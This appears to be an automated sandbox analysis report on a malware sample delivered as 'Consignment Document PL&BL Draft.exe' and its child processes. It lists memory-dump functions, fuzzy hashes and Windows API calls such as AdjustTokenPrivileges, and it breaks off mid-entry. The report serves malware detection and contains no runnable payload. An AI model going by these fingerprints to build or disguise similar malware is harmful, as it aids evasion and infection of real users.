Source File: 00000000.00000002.234186130.00000000015E0000.00000040.00000001.sdmp, Offset: 015E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad469b5acf2a198a7d88ac738b926aaa0cc14ec473b54b398f2c28ebe5c0f337
Instruction ID: 4196105afce23fb3632af6467f6a14e209815186776e327581cc6a37c3376329
Opcode Fuzzy Hash: ad469b5acf2a198a7d88ac738b926aaa0cc14ec473b54b398f2c28ebe5c0f337
Instruction Fuzzy Hash: 0212E8F14117468BE732CF65ED9818A3B60F745328F906308DA632FAD9D7B815AACF44

Uniqueness

Uniqueness Score: -1.00%

Function 015EC0F4, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.234186130.00000000015E0000.00000040.00000001.sdmp, Offset: 015E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8242dfa75baeb547ea0d337a5cb267b2208013d3ef50b0d4827d8130399b09b
Instruction ID: 580e3b98fe9c0a0809d6cc3588b3ad0f9d2d8a002dc99c266953815fa63f76ae
Opcode Fuzzy Hash: e8242dfa75baeb547ea0d337a5cb267b2208013d3ef50b0d4827d8130399b09b
Instruction Fuzzy Hash: AFA14C36E0021A8FCF19DFA5C84859EBBF2FFC5300B15856AE905AF261EB71E915CB40

Uniqueness

Uniqueness Score: -1.00%

Function 015EE528, Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.234186130.00000000015E0000.00000040.00000001.sdmp, Offset: 015E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13304b943bda2ea23e371e99fee1b718ab290874177b3c5fe196667f6456556a
Instruction ID: b46009c231f8bc067cd67b416233804f61a289927e663eff000520b6a8d6ef6b
Opcode Fuzzy Hash: 13304b943bda2ea23e371e99fee1b718ab290874177b3c5fe196667f6456556a
Instruction Fuzzy Hash: CDC15DB18117468BD732CF65EC9818B3B71FB85328F506309D5632BAD8D7B814AACF84

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Consignment Document PL&BL Draft.exe PID: 6796 Parent PID: 6620 Consignment Document PL&BL Draft.exeCOMMON

Executed Functions

Function 01679248, Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0167948E

Memory Dump Source

Source File: 00000001.00000002.243155617.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a11cb296236c220eb6d3cf5940c9026563833d3fc1fd8d2636360ab8807485c7
Instruction ID: 8364e9b2e93ae0ed86d96e20eeda1f89e283707f8f38a4853a6c61b77f3fa92e
Opcode Fuzzy Hash: a11cb296236c220eb6d3cf5940c9026563833d3fc1fd8d2636360ab8807485c7
Instruction Fuzzy Hash: 8D711370A00B058FD764DF6AC84579ABBF1BF88328F10892DD58ADBB50DB35E8458B91

Uniqueness

Uniqueness Score: -1.00%

Function 0167D6F0, Relevance: 1.6, APIs: 1, Instructions: 128COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0167FCAA

Memory Dump Source

Source File: 00000001.00000002.243155617.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: bfb2dbe200917391316c7bc2abf49dd4e84183ce761dffdacbd8b3bb0f05efae
Instruction ID: 0144e05fd0e722f705eb6a268ce44f0b2056c2cf104081222a86d236e89375f5
Opcode Fuzzy Hash: bfb2dbe200917391316c7bc2abf49dd4e84183ce761dffdacbd8b3bb0f05efae
Instruction Fuzzy Hash: 9A51F2B1D143489FDB15CFA9C880ADEBFB1BF48314F25826AE819AB311D7749885CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0167FB8C, Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0167FCAA

Memory Dump Source

Source File: 00000001.00000002.243155617.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ad601927d10a2c3268c607ee02a7557cf4df2d2d01e4847adcdbe541d2c29436
Instruction ID: 1f377a190509a7aaedd667fd184e2d2b911643ae5c77396908f338d685d9c342
Opcode Fuzzy Hash: ad601927d10a2c3268c607ee02a7557cf4df2d2d01e4847adcdbe541d2c29436
Instruction Fuzzy Hash: E251C1B1D10348DFDB14CFAAD884ADEBBB5BF48314F24816AE819AB310D7759885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0167D70C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0167FCAA

Memory Dump Source

Source File: 00000001.00000002.243155617.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 3ee7c8628016d013afcf69b3e4ccea2ee562f1d1e188d98ccb59c60951b60519
Instruction ID: 5669213d1ba2e5638601c394f342bf96998c0afaca590ab6004811096a905a86
Opcode Fuzzy Hash: 3ee7c8628016d013afcf69b3e4ccea2ee562f1d1e188d98ccb59c60951b60519
Instruction Fuzzy Hash: 1651C0B1D10308DFDB14CF99C884ADEBBB5BF48314F24822AE819AB310D7759885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01673CAC, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01675401

Memory Dump Source

Source File: 00000001.00000002.243155617.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ee9e1dd197d035c265c6727e93452f6a89b50f45d4e6fda58c4537a4e23e927c
Instruction ID: 4b89d8a35ae83ba16ad509970fc22ed479b70a543e52daeef3a1dfb68424f767
Opcode Fuzzy Hash: ee9e1dd197d035c265c6727e93452f6a89b50f45d4e6fda58c4537a4e23e927c
Instruction Fuzzy Hash: FB41D271D0061CCBDB24CFA9C884BDEBBB5BF89304F248469D409AB255DBB5694ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 01675345, Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01675401

Memory Dump Source

Source File: 00000001.00000002.243155617.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d343bc79da8e1408d8f557a9a47c7fe60af45768839fe0fa1c95ad1d94619579
Instruction ID: 1c555fbd3e2c7f307a466f9404dfba3cb2a82aed4fb633f88f1c071bea420219
Opcode Fuzzy Hash: d343bc79da8e1408d8f557a9a47c7fe60af45768839fe0fa1c95ad1d94619579
Instruction Fuzzy Hash: 0A410271D00618CFDB24CFA9C9857DEBBB5BF88308F20846AD409AB251DB75594ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 05782470, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05782531

Memory Dump Source

Source File: 00000001.00000002.248842486.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: bbb1a3c6ed0658ebe7968e542a2923c2e7f6228bd015da0d33fb3402106bf3f7
Instruction ID: a329859ea03f024fa95ad8fa56edc8d9ffe60d7cfc892a1218fea353428f26d4
Opcode Fuzzy Hash: bbb1a3c6ed0658ebe7968e542a2923c2e7f6228bd015da0d33fb3402106bf3f7
Instruction Fuzzy Hash: 25414CB89002058FCB14DF99C448AAAFBF5FF88315F158498D419AB321D734A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0167B48C, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0167BB1E,?,?,?,?,?), ref: 0167BBDF

Memory Dump Source

Source File: 00000001.00000002.243155617.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1adedf59c8c8d5c7de96148b73488c56c9a71b887028e0143d7fc562262d1988
Instruction ID: 8b723d482433c726618740f719930c82994b2d05de86494abca349a90a5957c4
Opcode Fuzzy Hash: 1adedf59c8c8d5c7de96148b73488c56c9a71b887028e0143d7fc562262d1988
Instruction Fuzzy Hash: AE21E4B59002489FDB10CF9AD884AEEBBF8EF48320F14801AE918A7310D774A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0578CCE8, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0578CD76

Memory Dump Source

Source File: 00000001.00000002.248842486.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false

Similarity

API ID: ExtentPoint32Text
String ID:
API String ID: 223599850-0
Opcode ID: 46f6c9d1b4926af6a4a09930043794f7164b41ff48b39aa98faa9ca3e9eb650b
Instruction ID: e5e09338eadcd3c8cd6ef5eae12691e85c2568209560ea601b74a215d3ffcefd
Opcode Fuzzy Hash: 46f6c9d1b4926af6a4a09930043794f7164b41ff48b39aa98faa9ca3e9eb650b
Instruction Fuzzy Hash: BC21F2B1D012099FDB10DF99D984AAEFBF8FB48314F14842EE919AB200C774A944CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0167BB52, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0167BB1E,?,?,?,?,?), ref: 0167BBDF

Memory Dump Source

Source File: 00000001.00000002.243155617.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7fd45c58ef6e7c132f48fccd3dbc6e5a352175ae35d3061f7b79d453bc77ed68
Instruction ID: 1235674ef0f167f5ac448fef3656417591205aaa966f0bdfda1a0defa43b684a
Opcode Fuzzy Hash: 7fd45c58ef6e7c132f48fccd3dbc6e5a352175ae35d3061f7b79d453bc77ed68
Instruction Fuzzy Hash: B221B5B5D002499FDB10CF99D984AEEBBF4EB48324F14841AE914A7310D774A944CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0578CCF0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0578CD76

Memory Dump Source

Source File: 00000001.00000002.248842486.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false

Similarity

API ID: ExtentPoint32Text
String ID:
API String ID: 223599850-0
Opcode ID: a50bf31f93b5ff95dc4f75a1219aa8b48912c49fd331f3b753a9394b4d73e45b
Instruction ID: 800ca197a7182997fb073bd23de16bc55bea5757748ccc8cad2d8d5360470716
Opcode Fuzzy Hash: a50bf31f93b5ff95dc4f75a1219aa8b48912c49fd331f3b753a9394b4d73e45b
Instruction Fuzzy Hash: 9221E3B1D013599FDB10DF99D984AEEFBF8FB48314F14842EE919AB200C774A944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01678620, Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01679909,00000800,00000000,00000000), ref: 01679B1A

Memory Dump Source

Source File: 00000001.00000002.243155617.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7f58e639c6b892a2267e6caf81f90341394a916842a77847bf9f8d1339eca6c8
Instruction ID: ab3fd1bd47a039a9ae14939df39fc017507700420e4f382870e3352bdfeade5c
Opcode Fuzzy Hash: 7f58e639c6b892a2267e6caf81f90341394a916842a77847bf9f8d1339eca6c8
Instruction Fuzzy Hash: 20214C728043488FDB10DFA9C884ADEFBF4AF59324F04845ED555A7200C374A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01678638, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01679909,00000800,00000000,00000000), ref: 01679B1A

Memory Dump Source

Source File: 00000001.00000002.243155617.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3b6ace4895d7d80da12a0b750d85d8ec83eff0ede27b444e3b199d077aa30652
Instruction ID: e0675c12a539c9f74d66e30e358a88f92c0d7d6d29282c61657f401c4505a9da
Opcode Fuzzy Hash: 3b6ace4895d7d80da12a0b750d85d8ec83eff0ede27b444e3b199d077aa30652
Instruction Fuzzy Hash: 9F111AB19002488FDB10CF9AD844BDEFBF4EB48324F04841AE915A7200C374A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01679AA8, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01679909,00000800,00000000,00000000), ref: 01679B1A

Memory Dump Source

Source File: 00000001.00000002.243155617.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2d9dafdaf0e94408f22344b96a718e4eeed55198ad00a76eb6adb92543035881
Instruction ID: 96d1aad3c15d9221c90742cf14d593b475cab460d4e3e584f7c0828c299a86d8
Opcode Fuzzy Hash: 2d9dafdaf0e94408f22344b96a718e4eeed55198ad00a76eb6adb92543035881
Instruction Fuzzy Hash: EE1126B6D003488FDB10CFA9D884BEEFBF4AB48324F14842AD919A7200C374A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0167FDD8, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0167FDC8,?,?,?,?), ref: 0167FE3D

Memory Dump Source

Source File: 00000001.00000002.243155617.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: de88d46d7e21abfbb4c2440d41ec52364e8363a89857e3760131a0a90ab9157a
Instruction ID: 61ae5d826eb12b4399c913408d60ad5e1effaa67fe665bd2142c1e2bf868ce5b
Opcode Fuzzy Hash: de88d46d7e21abfbb4c2440d41ec52364e8363a89857e3760131a0a90ab9157a
Instruction Fuzzy Hash: 161136B58002099FDB10CF99D888BDFFBF8EB48324F10855AE929A7340C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01679428, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0167948E

Memory Dump Source

Source File: 00000001.00000002.243155617.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 28f141dd54009f03228ca8a3b200159c71c0ebf0b9a82a063d868ae3766c96c9
Instruction ID: 3ac5ae4b3d4a9a3fe38dfce33227c3c306450dea69c9f8edd4418f7db0e8d304
Opcode Fuzzy Hash: 28f141dd54009f03228ca8a3b200159c71c0ebf0b9a82a063d868ae3766c96c9
Instruction Fuzzy Hash: C911E0B6D016498FDB10CF9AC844BDEFBF4EF88328F14852AD829A7614C375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0167D744, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0167FDC8,?,?,?,?), ref: 0167FE3D

Memory Dump Source

Source File: 00000001.00000002.243155617.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: f6f7ed73bb3d3c1f83f039e5b251f138b72dc604be4074eb1b1ab335defad7f6
Instruction ID: 0d23a53f6cdcb917bb04a9f6e49ea99da2d963001257713f42280cbaa3048e83
Opcode Fuzzy Hash: f6f7ed73bb3d3c1f83f039e5b251f138b72dc604be4074eb1b1ab335defad7f6
Instruction Fuzzy Hash: 141106B59002489FDB10CF99D889BDFFBF8EB48324F108459E925A7301C374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0161D4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.242721401.000000000161D000.00000040.00000001.sdmp, Offset: 0161D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd08dcfa7cf3c0cf6c23717061417fedb2cee2a938b7bf80adac6cbd19289b7c
Instruction ID: 9802a81718a9cb27b9de3513e8647ef889a67331ba5971f56c744965b9d468fd
Opcode Fuzzy Hash: dd08dcfa7cf3c0cf6c23717061417fedb2cee2a938b7bf80adac6cbd19289b7c
Instruction Fuzzy Hash: 79210671504240DFDB05DF58DDC8B2ABF65FB88318F28C569E8050B34AC336D856DAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0162D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.242950600.000000000162D000.00000040.00000001.sdmp, Offset: 0162D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5d722032dd3b20c0cfd19f55e100405fc1e20abc612ca62cce4e6ae21e46d1b
Instruction ID: c7c3d194d0ff575a6448bab5edba04bfbf16219a9ec67393cc3716281c2e4247
Opcode Fuzzy Hash: f5d722032dd3b20c0cfd19f55e100405fc1e20abc612ca62cce4e6ae21e46d1b
Instruction Fuzzy Hash: BC212271508640DFCB11CF98DDC4B26BB65FB88354F24C969E80A4B396C73AD847CE61

Uniqueness

Uniqueness Score: -1.00%

Function 0162D006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.242950600.000000000162D000.00000040.00000001.sdmp, Offset: 0162D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8baa140c6ede27847942d962359b2e3ebc0eec77745da5a60b0f9c92538504c1
Instruction ID: 898d7ccdc36e73ac929e001aee17b6b4219a451d945d52e0749bda22f664d7cb
Opcode Fuzzy Hash: 8baa140c6ede27847942d962359b2e3ebc0eec77745da5a60b0f9c92538504c1
Instruction Fuzzy Hash: 372180754087809FCB02CF64D994B15BF71EB46314F28C5EAD8458F3A7C33A985ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0161D4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.242721401.000000000161D000.00000040.00000001.sdmp, Offset: 0161D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2afa457568e0bb640a5e96658e9777ab49a47e984ab559958fa4953148591eca
Instruction ID: 98c6ab694c4f5d8c6b684a3d2a0729c0a9593d0c88464c4e2afbe9d2bc69fa36
Opcode Fuzzy Hash: 2afa457568e0bb640a5e96658e9777ab49a47e984ab559958fa4953148591eca
Instruction Fuzzy Hash: 6511B176404280DFCB16CF54D9C4B1ABF71FB84324F28C6A9D8450B75AC336D45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: Rczgwoxvqzh.exe PID: 6872 Parent PID: 6796 Rczgwoxvqzh.exeCOMMON

Executed Functions

Function 00007FFAEEBE000A, Relevance: 1.8, Strings: 1, Instructions: 586COMMON

Download Yara Rule

Strings

>0N, xrefs: 00007FFAEEBE0061

Memory Dump Source

Source File: 00000002.00000002.259019120.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false

Similarity

API ID:
String ID: >0N
API String ID: 0-3785482972
Opcode ID: 9582dd2ef4c911c0d281696f5e3a095f5c223f2fd0826bf33c1ad88db7748609
Instruction ID: e095a144e5977538ad37ac409e7ea92852e8e45fba5f6579d8a9e2756fa66435
Opcode Fuzzy Hash: 9582dd2ef4c911c0d281696f5e3a095f5c223f2fd0826bf33c1ad88db7748609
Instruction Fuzzy Hash: 96418262E0D7D64FD357A77A98A52E43FB1DF9316070E40FBC188CA0A7D848180D83A3

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEEBE04F9, Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

0v?L, xrefs: 00007FFAEEBE051B

Memory Dump Source

Source File: 00000002.00000002.259019120.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false

Similarity

API ID:
String ID: 0v?L
API String ID: 0-2795967704
Opcode ID: fd8258800d8a35d6d0f35cdd41c0398aaffee7fd937cda31da72592dc8b71086
Instruction ID: 5c5cc65d50bbf90dfea62bf8dcdb264985123939a833d670ce3f305cf0ec0a7f
Opcode Fuzzy Hash: fd8258800d8a35d6d0f35cdd41c0398aaffee7fd937cda31da72592dc8b71086
Instruction Fuzzy Hash: 1F312462E0CE490FDB94EB2DD895BB97BD1EF9A310B0545BBC04DC71EADD18A8068781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEEBE00C0, Relevance: .5, Instructions: 501COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.259019120.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59831fa523775bd7d8c31eff944ef4554e4a14d392e6457bf922f2cb4edbc28d
Instruction ID: 0092466ed04edefc78d2342c6f7fc6922c9f8f2ed5f3cde6d84c3e3e1259915f
Opcode Fuzzy Hash: 59831fa523775bd7d8c31eff944ef4554e4a14d392e6457bf922f2cb4edbc28d
Instruction Fuzzy Hash: 6001B562E0C7660FEB95FB3EE4922E83BE1CF8622074544BBD149CA1A7DD481C894792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEEBE00D8, Relevance: .5, Instructions: 492COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.259019120.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f802dca00861a3a69654ac65a10f65a00e806bb6ff174e97deff482e85960cd
Instruction ID: 08f24b3010173dbc04eea7e90555c4ab23cf2d9fb1d821173f44b5c9940b4a88
Opcode Fuzzy Hash: 6f802dca00861a3a69654ac65a10f65a00e806bb6ff174e97deff482e85960cd
Instruction Fuzzy Hash: 98F0C852A0C7A60AEB9AB77AA5921F83FA1CF5611074944BBD14DCA1A7DC481C854392

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEEBE00E0, Relevance: .5, Instructions: 487COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.259019120.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdb75f2a3dbdb53c218074ec791b4f4b8a63580e42430fb2a7bd1fd495bc95b8
Instruction ID: cee1590b033b045ece0d7ce8213293ff4fdcffe2ee0e0f0ee054c39289de2387
Opcode Fuzzy Hash: fdb75f2a3dbdb53c218074ec791b4f4b8a63580e42430fb2a7bd1fd495bc95b8
Instruction Fuzzy Hash: 00F0B452E0CBA60DEB9AB73A51962F83EB1CF5711074A84FAD45DCA1FBDC881C844392

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEEBE07ED, Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.259019120.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e5e03bb077876b70c909b831aeec99327b9ad23693522d32355a160e529dcc3
Instruction ID: 74e038795b5b4f8e1d18554a4ca4310a02eb8af02fafbf9439c8eaf3d3d7d259
Opcode Fuzzy Hash: 1e5e03bb077876b70c909b831aeec99327b9ad23693522d32355a160e529dcc3
Instruction Fuzzy Hash: 3B31D472E0C94E0FEB94EB6C94553F9BBE1EF99310F0582B6D44DD3296DD68580187C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEEBE05F9, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.259019120.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3658607ef9047348404e2ff3b635e25bbbd0a3167e2b14efe16308b382bddaaf
Instruction ID: e47ba49891bdab798111f6865ec303f890d152a3ae9ed2a0beb50956497a4c84
Opcode Fuzzy Hash: 3658607ef9047348404e2ff3b635e25bbbd0a3167e2b14efe16308b382bddaaf
Instruction Fuzzy Hash: 9D31C062F1C94A0FEB85FB7CC0A97B867D2EF99210B4881B6D00DC329BED58A8464341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEEBE0710, Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.259019120.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e22d56e32e4e2eb24f01545494b1f9a1f9d228345cd934d1b283ea5cc024e92
Instruction ID: 3ddd1438b9b3be6087073bfec2141e2adbc3e66ae2f56d0b954b312defd8b7e7
Opcode Fuzzy Hash: 6e22d56e32e4e2eb24f01545494b1f9a1f9d228345cd934d1b283ea5cc024e92
Instruction Fuzzy Hash: C511A571B58C0E8FDE84FB6CD4C9A6833D1EBA93517958172D00DC326AED58EC828B85

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEEBE0990, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.259019120.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f810e489fa635c0d3a2a4a82c158e706d6d79ba81d275a6caa169607a27e5a13
Instruction ID: 722d7d2e9474104c2e0ec7c843fa2f27f598ea37527aa0d0a94e0dca0a68262d
Opcode Fuzzy Hash: f810e489fa635c0d3a2a4a82c158e706d6d79ba81d275a6caa169607a27e5a13
Instruction Fuzzy Hash: 6CF0A071F0984D8FDA44FF2DC4C966437D1EB69340B8595B2D00DC32A6ED58AC868782

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEEBE04C8, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.259019120.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56e6f3d8c19be1fb89f2213bb62796bd6464ab33cf29285406a3fa1af6a961f9
Instruction ID: 51444b4b1b553f12760dd3a340ce1014e541afd3c9de0dbeeb2820ad239196c1
Opcode Fuzzy Hash: 56e6f3d8c19be1fb89f2213bb62796bd6464ab33cf29285406a3fa1af6a961f9
Instruction Fuzzy Hash: 0FE0C2A2E1DFDE4EE9ACB23D04912B87DA0DB5A640B4984EEC14CC71BAD9881D0D43C2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: Icda.exe PID: 6888 Parent PID: 6796 Icda.exeCOMMON

Executed Functions

Function 0523B068, Relevance: 2.2, Strings: 1, Instructions: 906COMMON

Download Yara Rule

Strings

r, xrefs: 0523BB1C

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 74f430dca5d669e5d60e20e128014e346fed82299f5e88e7d359c61630062c6b
Instruction ID: d1ba273b9c160873fc5cf34c1e42edaf56e876aef312f7c3db485dc7450c664a
Opcode Fuzzy Hash: 74f430dca5d669e5d60e20e128014e346fed82299f5e88e7d359c61630062c6b
Instruction Fuzzy Hash: B88248B1A1060ADFCB14CF68C585AADFBF2FF88310F158569D45AAB651DB30E981CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05233850, Relevance: 2.0, Strings: 1, Instructions: 756COMMON

Download Yara Rule

Strings

>_Ir, xrefs: 05233F9D

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID: >_Ir
API String ID: 0-3386957151
Opcode ID: b870bdf2d37dccf0e291f9d91e031885e9303a2308e23f31178c343e2e341f29
Instruction ID: 78823735012f5323eea0d4a07afaee7399ea229479ea4a4037e70b9213b37c25
Opcode Fuzzy Hash: b870bdf2d37dccf0e291f9d91e031885e9303a2308e23f31178c343e2e341f29
Instruction Fuzzy Hash: D152F3B1A10206DFCB14CF58C8859BAFBB6FF94310B15C9A6D9199F212D771EE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 052910A3, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05291123

Memory Dump Source

